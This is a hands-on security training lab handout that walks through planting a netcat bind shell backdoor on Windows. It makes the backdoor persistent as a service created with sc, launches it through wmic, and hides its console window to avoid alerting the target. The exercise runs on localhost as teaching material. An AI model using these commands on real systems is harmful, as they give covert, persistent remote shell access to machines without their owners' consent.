Practical DAY 4

Maintaining presence and living out of land technique

Running Commands with SC and WMIC

We will use a simple and efficient method used by many attackers and run a command that invokes a
Netcat creating a backdoor command shell access on the target device.

nc.exe -l -p 4444 -e cmd.exe

In the Tools directory, there is a file called ncexer.bat that will create two terminal windows for you in
different colors. Run ncexer.bat with admin privileges.

The yellow screen will be our Attacker and the grey screen will be our Victim.

Victim (grey):

C:\> \????\Tools\nc.exe -nvlp 4444 -e cmd.exe

Attacker (yellow):

C:\> \????\Tools\nc.exe -nv 127.0.0.1 4444

This is a simple and very efficient backdoor shell access for any Windows machine. The problem is that
this access stops once we kill the session. So how do we make it permanent? Create a service!

Attacker (yellow):

C:\> hostname
(here you will see your machine hostname)
Attacker (yellow):

C:\> sc \\Your_hostname create ncservice binpath= "c:\tools\nc.exe -l -p 4444 -e cmd.exe"

This is the same syntax we would be using if we were trying to execute a command on a remote computer.

Attacker (yellow):

C:\> sc \\Your_hostname query ncservice

The service STATE should be stopped.
Victim (grey):

C:\> netstat -nao 1 | find ":4444"

In order to make this working port 4444 should not be in use. If the port is in use from the previous exercise
we need to kill it either with Task Manager or with taskkill command:
Victim (grey):

C:\> taskkill /PID [process_ID]

Attacker (yellow):
C:\> sc \\Your_hostname start ncservice

In your Victim window, your netstat command should begin displaying output, indicating that TCP port
4444 is LISTENING. After 30 seconds, the sc command finishes with error message "The service did not
respond to the start or control request in a timely fashion".

Stop netstat command by pressing CTRL-C in the Victim (grey) window.

Then delete the original ncservice so that we can replace it with one that is more persistent, listening
beyond the 30-second timeout:

Attacker (yellow):

C:\> sc \\Your_hostname delete ncservice

Victim (grey):

C:\> netstat -nao 1 | find ":4444"

Attacker (yellow):

C:\> sc \\Your_hostname create ncservice2 binpath= "cmd.exe /k c:\tools\nc.exe -l -p 4444 -e cmd.exe"

Attacker (yellow):

C:\> sc \\Your_hostname start ncservice2

Although the command fails with the same error message the listener will keep listening and the port
remains open. Lets test:
Attacker (yellow):

C:\> c:\tools\nc.exe 127.0.0.1 4444

If we stop the Netcat client and drop the connection it will stop the Netcat because we invoked Netcat
with the -l option. This option creates a listener that listens for one connection and then stops running.
To make it persistent we need to invoke the command with a -L.

Kill Netcat client by pressing CTRL-C in both windows. Also delete ncservice2 with this command:

Attacker (yellow):
C:\> sc \\Your_hostname delete ncservice2

Victim (grey):
C:\> netstat -nao | find ":4444"

WMIC
Lets launch Netcat with wmic. We will now show that wmic is more efficient and has a smaller footprint
on the target. You should note that the new process we invoke will not have local SYSTEM privileges (as
previous) and it will run with administrator privileges.

Victim (grey):

C:\> wmic process where name="nc.exe" list brief /every:1

Attacker (yellow):

C:\> wmic process call create "c:\tools\nc.exe -l -p 4444 -e cmd.exe"

Look at the output in the victim window. Does Netcat process run?

Attacker (yellow):

C:\> c:\tools\nc.exe 127.0.0.1 4444

A console window opened when we invoked Netcat using wmic. This is not good as it might alert the
target. Lets try a new approach.

Attacker (yellow):

C:\> wmic process call create "c:\tools\nc.exe -dlp 4444 -e cmd.exe"

C:\> wmic process where name="nc.exe" delete